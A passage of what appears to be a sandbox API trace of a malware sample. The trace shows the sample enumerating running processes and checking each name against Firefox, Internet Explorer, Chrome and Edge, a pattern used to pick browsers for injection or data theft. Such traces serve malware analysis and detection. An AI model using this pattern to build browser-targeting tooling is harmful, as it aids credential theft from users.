th32ProcessID=0x1dc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x17c, pcPriClassBase=8, dwFlags=0x0, szExeFile="lsm.exe")) returned 1 [0234.656] lstrcmpiA (lpString1="lsm.exe", lpString2="firefox.exe") returned 1 [0234.656] lstrcmpiA (lpString1="lsm.exe", lpString2="iexplore.exe") returned 1 [0234.656] lstrcmpiA (lpString1="lsm.exe", lpString2="chrome.exe") returned 1 [0234.656] lstrcmpiA (lpString1="lsm.exe", lpString2="microsoftedgecp.exe") returned -1 [0234.656] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x254, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0234.656] lstrcmpiA (lpString1="svchost.exe", lpString2="firefox.exe") returned 1 [0234.656] lstrcmpiA (lpString1="svchost.exe", lpString2="iexplore.exe") returned 1 [0234.656] lstrcmpiA (lpString1="svchost.exe", lpString2="chrome.exe") returned 1 [0234.656] lstrcmpiA (lpString1="svchost.exe", lpString2="microsoftedgecp.exe") returned 1 [0234.656] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x298, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0234.657] lstrcmpiA (lpString1="svchost.exe", lpString2="firefox.exe") returned 1 [0234.657] lstrcmpiA (lpString1="svchost.exe", lpString2="iexplore.exe") returned 1 [0234.657] lstrcmpiA (lpString1="svchost.exe", lpString2="chrome.exe") returned 1 [0234.657] lstrcmpiA (lpString1="svchost.exe", lpString2="microsoftedgecp.exe") returned 1 [0234.657] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x2cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x11, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0234.657] lstrcmpiA (lpString1="svchost.exe", lpString2="firefox.exe") returned 1 [0234.658] lstrcmpiA (lpString1="svchost.exe", lpString2="iexplore.exe") returned 1 [0234.658] lstrcmpiA (lpString1="svchost.exe", lpString2="chrome.exe") returned 1 [0234.658] lstrcmpiA (lpString1="svchost.exe", lpString2="microsoftedgecp.exe") returned 1 [0234.658] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x334, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x13, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0234.658] lstrcmpiA (lpString1="svchost.exe", lpString2="firefox.exe") returned 1 [0234.658] lstrcmpiA (lpString1="svchost.exe", lpString2="iexplore.exe") returned 1 [0234.658] lstrcmpiA (lpString1="svchost.exe", lpString2="chrome.exe") returned 1 [0234.658] lstrcmpiA (lpString1="svchost.exe", lpString2="microsoftedgecp.exe") returned 1 [0234.658] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x36c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1f, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0234.659] lstrcmpiA (lpString1="svchost.exe", lpString2="firefox.exe") returned 1 [0234.659] lstrcmpiA (lpString1="svchost.exe", lpString2="iexplore.exe") returned 1 [0234.659] lstrcmpiA (lpString1="svchost.exe", lpString2="chrome.exe") returned 1 [0234.659] lstrcmpiA (lpString1="svchost.exe", lpString2="microsoftedgecp.exe") returned 1 [0234.659] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x3a8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x2cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1 [0234.659] lstrcmpiA (lpString1="audiodg.exe", lpString2="firefox.exe") returned -1 [0234.659] lstrcmpiA (lpString1="audiodg.exe", lpString2="iexplore.exe") returned -1 [0234.659] lstrcmpiA (lpString1="audiodg.exe", lpString2="chrome.exe") returned -1 [0234.659] lstrcmpiA (lpString1="audiodg.exe", lpString2="microsoftedgecp.exe") returned -1 [0234.659] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x3f8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0234.660] lstrcmpiA (lpString1="svchost.exe", lpString2="firefox.exe") returned 1 [0234.660] lstrcmpiA (lpString1="svchost.exe", lpString2="iexplore.exe") returned 1 [0234.660] lstrcmpiA (lpString1="svchost.exe", lpString2="chrome.exe") returned 1 [0234.660] lstrcmpiA (lpString1="svchost.exe", lpString2="microsoftedgecp.exe") returned 1 [0234.660] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x124, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xe, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0234.660] lstrcmpiA (lpString1="svchost.exe", lpString2="firefox.exe") returned 1 [0234.660] lstrcmpiA (lpString1="svchost.exe", lpString2="iexplore.exe") returned 1 [0234.660] lstrcmpiA (lpString1="svchost.exe", lpString2="chrome.exe") returned 1 [0234.660] lstrcmpiA (lpString1="svchost.exe", lpString2="microsoftedgecp.exe") returned 1 [0234.660] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x448, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x334, pcPriClassBase=8, dwFlags=0x0, szExeFile="dwm.exe")) returned 1 [0234.661] lstrcmpiA (lpString1="dwm.exe", lpString2="firefox.exe") returned -1 [0234.661] lstrcmpiA (lpString1="dwm.exe", lpString2="iexplore.exe") returned -1 [0234.661] lstrcmpiA (lpString1="dwm.exe", lpString2="chrome.exe") returned 1 [0234.661] lstrcmpiA (lpString1="dwm.exe", lpString2="microsoftedgecp.exe") returned -1 [0234.661] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x480, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1 [0234.661] lstrcmpiA (lpString1="spoolsv.exe", lpString2="firefox.exe") returned 1 [0234.661] lstrcmpiA (lpString1="spoolsv.exe", lpString2="iexplore.exe") returned 1 [0234.661] lstrcmpiA (lpString1="spoolsv.exe", lpString2="chrome.exe") returned 1 [0234.662] lstrcmpiA (lpString1="spoolsv.exe", lpString2="microsoftedgecp.exe") returned 1 [0234.662] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x4ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0234.662] lstrcmpiA (lpString1="taskhost.exe", lpString2="firefox.exe") returned 1 [0234.662] lstrcmpiA (lpString1="taskhost.exe", lpString2="iexplore.exe") returned 1 [0234.662] lstrcmpiA (lpString1="taskhost.exe", lpString2="chrome.exe") returned 1 [0234.662] lstrcmpiA (lpString1="taskhost.exe", lpString2="microsoftedgecp.exe") returned 1 [0234.662] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x4d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x12, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0234.663] lstrcmpiA (lpString1="svchost.exe", lpString2="firefox.exe") returned 1 [0234.663] lstrcmpiA (lpString1="svchost.exe", lpString2="iexplore.exe") returned 1 [0234.663] lstrcmpiA (lpString1="svchost.exe", lpString2="chrome.exe") returned 1 [0234.663] lstrcmpiA (lpString1="svchost.exe", lpString2="microsoftedgecp.exe") returned 1 [0234.663] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x50c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x36c, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskeng.exe")) returned 1 [0234.663] lstrcmpiA (lpString1="taskeng.exe", lpString2="firefox.exe") returned 1 [0234.663] lstrcmpiA (lpString1="taskeng.exe", lpString2="iexplore.exe") returned 1 [0234.663] lstrcmpiA (lpString1="taskeng.exe", lpString2="chrome.exe") returned 1 [0234.663] lstrcmpiA (lpString1="taskeng.exe", lpString2="microsoftedgecp.exe") returned 1 [0234.663] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xc4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="abortion-serbia-effect.exe")) returned 1 [0234.664] lstrcmpiA (lpString1="abortion-serbia-effect.exe", lpString2="firefox.exe") returned -1 [0234.664] lstrcmpiA (lpString1="abortion-serbia-effect.exe", lpString2="iexplore.exe") returned -1 [0234.664] lstrcmpiA (lpString1="abortion-serbia-effect.exe", lpString2="chrome.exe") returned -1 [0234.664] lstrcmpiA (lpString1="abortion-serbia-effect.exe", lpString2="microsoftedgecp.exe") returned -1 [0234.664] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x62c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="beverages-tapes-dod.exe")) returned 1 [0234.664] lstrcmpiA (lpString1="beverages-tapes-dod.exe", lpString2="firefox.exe") returned -1 [0234.664] lstrcmpiA (lpString1="beverages-tapes-dod.exe", lpString2="iexplore.exe") returned -1 [0234.664] lstrcmpiA (lpString1="beverages-tapes-dod.exe", lpString2="chrome.exe") returned -1 [0234.664] lstrcmpiA (lpString1="beverages-tapes-dod.exe", lpString2="microsoftedgecp.exe") returned -1 [0234.664] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x5a4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="receptor paintings.exe")) returned 1 [0234.665] lstrcmpiA (lpString1="receptor paintings.exe", lpString2="firefox.exe") returned 1 [0234.665] lstrcmpiA (lpString1="receptor paintings.exe", lpString2="iexplore.exe") returned 1 [0234.665] lstrcmpiA (lpString1="receptor paintings.exe", lpString2="chrome.exe") returned 1 [0234.665] lstrcmpiA (lpString1="receptor paintings.exe", lpString2="microsoftedgecp.exe") returned 1 [0234.665] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x780, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="definitely.exe")) returned 1 [0234.665] lstrcmpiA (lpString1="definitely.exe", lpString2="firefox.exe") returned -1 [0234.665] lstrcmpiA (lpString1="definitely.exe", lpString2="iexplore.exe") returned -1 [0234.665] lstrcmpiA (lpString1="definitely.exe", lpString2="chrome.exe") returned 1 [0234.665] lstrcmpiA (lpString1="definitely.exe", lpString2="microsoftedgecp.exe") returned -1 [0234.665] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x240, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="knewdifferenceskaren.exe")) returned 1 [0234.666] lstrcmpiA (lpString1="knewdifferenceskaren.exe", lpString2="firefox.exe") returned 1 [0234.666] lstrcmpiA (lpString1="knewdifferenceskaren.exe", lpString2="iexplore.exe") returned 1 [0234.666] lstrcmpiA (lpString1="knewdifferenceskaren.exe", lpString2="chrome.exe") returned 1 [0234.666] lstrcmpiA (lpString1="knewdifferenceskaren.exe", lpString2="microsoftedgecp.exe") returned -1 [0234.666] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x2c8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="whenever.exe")) returned 1 [0234.667] lstrcmpiA (lpString1="whenever.exe", lpString2="firefox.exe") returned 1 [0234.667] lstrcmpiA (lpString1="whenever.exe", lpString2="iexplore.exe") returned 1 [0234.667] lstrcmpiA (lpString1="whenever.exe", lpString2="chrome.exe") returned 1 [0234.667] lstrcmpiA (lpString1="whenever.exe", lpString2="microsoftedgecp.exe") returned 1 [0234.667] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x310, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="potentially.exe")) returned 1 [0234.667] lstrcmpiA (lpString1="potentially.exe", lpString2="firefox.exe") returned 1 [0234.667] lstrcmpiA (lpString1="potentially.exe", lpString2="iexplore.exe") returned 1 [0234.667] lstrcmpiA (lpString1="potentially.exe", lpString2="chrome.exe") returned 1 [0234.667] lstrcmpiA (lpString1="potentially.exe", lpString2="microsoftedgecp.exe") returned 1 [0234.667] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x314, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="seeker.exe")) returned 1 [0234.668] lstrcmpiA (lpString1="seeker.exe", lpString2="firefox.exe") returned 1 [0234.668] lstrcmpiA (lpString1="seeker.exe", lpString2="iexplore.exe") returned 1 [0234.668] lstrcmpiA (lpString1="seeker.exe", lpString2="chrome.exe") returned 1 [0234.668] lstrcmpiA (lpString1="seeker.exe", lpString2="microsoftedgecp.exe") returned 1 [0234.668] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x320, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="objects-virus-israeli.exe")) returned 1 [0234.668] lstrcmpiA (lpString1="objects-virus-israeli.exe", lpString2="firefox.exe") returned 1 [0234.668] lstrcmpiA (lpString1="objects-virus-israeli.exe", lpString2="iexplore.exe") returned 1 [0234.668] lstrcmpiA (lpString1="objects-virus-israeli.exe", lpString2="chrome.exe") returned 1 [0234.668] lstrcmpiA (lpString1="objects-virus-israeli.exe", lpString2="microsoftedgecp.exe") returned 1 [0234.668] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x7a4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="birth bean.exe")) returned 1 [0234.669] lstrcmpiA (lpString1="birth bean.exe", lpString2="firefox.exe") returned -1 [0234.669] lstrcmpiA (lpString1="birth bean.exe", lpString2="iexplore.exe") returned -1 [0234.669] lstrcmpiA (lpString1="birth bean.exe", lpString2="chrome.exe") returned -1 [0234.669] lstrcmpiA (lpString1="birth bean.exe", lpString2="microsoftedgecp.exe") returned -1 [0234.669] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x688, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="ruby.exe")) returned 1 [0234.669] lstrcmpiA (lpString1="ruby.exe", lpString2="firefox.exe") returned 1 [0234.669] lstrcmpiA (lpString1="ruby.exe", lpString2="iexplore.exe") returned 1 [0234.669] lstrcmpiA (lpString1="ruby.exe", lpString2="chrome.exe") returned 1 [0234.669] lstrcmpiA (lpString1="ruby.exe", lpString2="microsoftedgecp.exe") returned 1 [0234.669] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x7f0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="zoodiffer.exe")) returned 1 [0234.670] lstrcmpiA (lpString1="zoodiffer.exe", lpString2="firefox.exe") returned 1 [0234.670] lstrcmpiA (lpString1="zoodiffer.exe", lpString2="iexplore.exe") returned 1 [0234.670] lstrcmpiA (lpString1="zoodiffer.exe", lpString2="chrome.exe") returned 1 [0234.670] lstrcmpiA (lpString1="zoodiffer.exe", lpString2="microsoftedgecp.exe") returned 1 [0234.670] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x7d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="smith.exe")) returned 1 [0234.671] lstrcmpiA (lpString1="smith.exe", lpString2="firefox.exe") returned 1 [0234.671] lstrcmpiA (lpString1="smith.exe", lpString2="iexplore.exe") returned 1 [0234.671] lstrcmpiA (lpString1="smith.exe", lpString2="chrome.exe") returned 1 [0234.671] lstrcmpiA (lpString1="smith.exe", lpString2="microsoftedgecp.exe") returned 1 [0234.671] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x58c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="spicedespite.exe")) returned 1 [0234.671] lstrcmpiA (lpString1="spicedespite.exe", lpString2="firefox.exe") returned 1 [0234.671] lstrcmpiA (lpString1="spicedespite.exe", lpString2="iexplore.exe") returned 1 [0234.671] lstrcmpiA (lpString1="spicedespite.exe", lpString2="chrome.exe") returned 1 [0234.671] lstrcmpiA (lpString1="spicedespite.exe", lpString2="microsoftedgecp.exe") returned 1 [0234.671] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x644, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="wooden.exe")) returned 1 [0234.672] lstrcmpiA (lpString1="wooden.exe", lpString2="firefox.exe") returned 1 [0234.672] lstrcmpiA (lpString1="wooden.exe", lpString2="iexplore.exe") returned 1 [0234.672] lstrcmpiA (lpString1="wooden.exe", lpString2="chrome.exe") returned 1 [0234.672] lstrcmpiA (lpString1="wooden.exe", lpString2="microsoftedgecp.exe") returned 1 [0234.672] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x7e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="dallasr.exe")) returned 1 [0234.672] lstrcmpiA (lpString1="dallasr.exe", lpString2="firefox.exe") returned -1 [0234.672] lstrcmpiA (lpString1="dallasr.exe", lpString2="iexplore.exe") returned -1 [0234.672] lstrcmpiA (lpString1="dallasr.exe", lpString2="chrome.exe") returned 1 [0234.672] lstrcmpiA (lpString1="dallasr.exe", lpString2="microsoftedgecp.exe") returned -1 [0234.672] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x5d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="bags shakira tourism.exe")) returned 1 [0234.673] lstrcmpiA (lpString1="bags shakira tourism.exe", lpString2="firefox.exe") returned -1 [0234.673] lstrcmpiA (lpString1="bags shakira tourism.exe", lpString2="iexplore.exe") returned -1 [0234.673] lstrcmpiA (lpString1="bags shakira tourism.exe", lpString2="chrome.exe") returned -1 [0234.673] lstrcmpiA (lpString1="bags shakira tourism.exe", lpString2="microsoftedgecp.exe") returned -1 [0234.673] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x7d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="constadvertisement.exe")) returned 1 [0234.673] lstrcmpiA (lpString1="constadvertisement.exe", lpString2="firefox.exe") returned -1 [0234.673] lstrcmpiA (lpString1="constadvertisement.exe", lpString2="iexplore.exe") returned -1 [0234.673] lstrcmpiA (lpString1="constadvertisement.exe", lpString2="chrome.exe") returned 1 [0234.673] lstrcmpiA (lpString1="constadvertisement.exe", lpString2="microsoftedgecp.exe") returned -1 [0234.674] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x2ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="sensors-democrat.exe")) returned 1 [0234.674] lstrcmpiA (lpString1="sensors-democrat.exe", lpString2="firefox.exe") returned 1 [0234.674] lstrcmpiA (lpString1="sensors-democrat.exe", lpString2="iexplore.exe") returned 1 [0234.674] lstrcmpiA (lpString1="sensors-democrat.exe", lpString2="chrome.exe") returned 1 [0234.674] lstrcmpiA (lpString1="sensors-democrat.exe", lpString2="microsoftedgecp.exe") returned 1 [0234.674] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x7fc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="doctrine alcohol.exe")) returned 1 [0234.675] lstrcmpiA (lpString1="doctrine alcohol.exe", lpString2="firefox.exe") returned -1 [0234.675] lstrcmpiA (lpString1="doctrine alcohol.exe", lpString2="iexplore.exe") returned -1 [0234.675] lstrcmpiA (lpString1="doctrine alcohol.exe", lpString2="chrome.exe") returned 1 [0234.675] lstrcmpiA (lpString1="doctrine alcohol.exe", lpString2="microsoftedgecp.exe") returned -1 [0234.675] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x53c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="population openings.exe")) returned 1 [0234.675] lstrcmpiA (lpString1="population openings.exe", lpString2="firefox.exe") returned 1 [0234.675] lstrcmpiA (lpString1="population openings.exe", lpString2="iexplore.exe") returned 1 [0234.675] lstrcmpiA (lpString1="population openings.exe", lpString2="chrome.exe") returned 1 [0234.675] lstrcmpiA (lpString1="population openings.exe", lpString2="microsoftedgecp.exe") returned 1 [0234.675] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x6b4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x254, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0234.676] lstrcmpiA (lpString1="WmiPrvSE.exe", lpString2="firefox.exe") returned 1 [0234.676] lstrcmpiA (lpString1="WmiPrvSE.exe", lpString2="iexplore.exe") returned 1 [0234.676] lstrcmpiA (lpString1="WmiPrvSE.exe", lpString2="chrome.exe") returned 1 [0234.676] lstrcmpiA (lpString1="WmiPrvSE.exe", lpString2="microsoftedgecp.exe") returned 1 [0234.676] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xa38, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0234.676] lstrcmpiA (lpString1="svchost.exe", lpString2="firefox.exe") returned 1 [0234.676] lstrcmpiA (lpString1="svchost.exe", lpString2="iexplore.exe") returned 1 [0234.676] lstrcmpiA (lpString1="svchost.exe", lpString2="chrome.exe") returned 1 [0234.676] lstrcmpiA (lpString1="svchost.exe", lpString2="microsoftedgecp.exe") returned 1 [0234.676] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xa58, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="sppsvc.exe")) returned 1 [0234.677] lstrcmpiA (lpString1="sppsvc.exe", lpString2="firefox.exe") returned 1 [0234.677] lstrcmpiA (lpString1="sppsvc.exe", lpString2="iexplore.exe") returned 1 [0234.677] lstrcmpiA (lpString1="sppsvc.exe", lpString2="chrome.exe") returned 1 [0234.677] lstrcmpiA (lpString1="sppsvc.exe", lpString2="microsoftedgecp.exe") returned 1 [0234.677] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xa70, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0234.677] lstrcmpiA (lpString1="svchost.exe", lpString2="firefox.exe") returned 1 [0234.677] lstrcmpiA (lpString1="svchost.exe", lpString2="iexplore.exe") returned 1 [0234.677] lstrcmpiA (lpString1="svchost.exe", lpString2="chrome.exe") returned 1 [0234.677] lstrcmpiA (lpString1="svchost.exe", lpString2="microsoftedgecp.exe") returned 1 [0234.677] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xb00, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0234.678] lstrcmpiA (lpString1="taskhost.exe", lpString2="firefox.exe") returned 1 [0234.678] lstrcmpiA (lpString1="taskhost.exe", lpString2="iexplore.exe") returned 1 [0234.678] lstrcmpiA (lpString1="taskhost.exe", lpString2="chrome.exe") returned 1 [0234.678] lstrcmpiA (lpString1="taskhost.exe", lpString2="microsoftedgecp.exe") returned 1 [0234.678] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xbdc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1b, th32ParentProcessID=0x1b0, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0234.679] lstrcmpiA (lpString1="explorer.exe", lpString2="firefox.exe") returned -1 [0234.679] lstrcmpiA 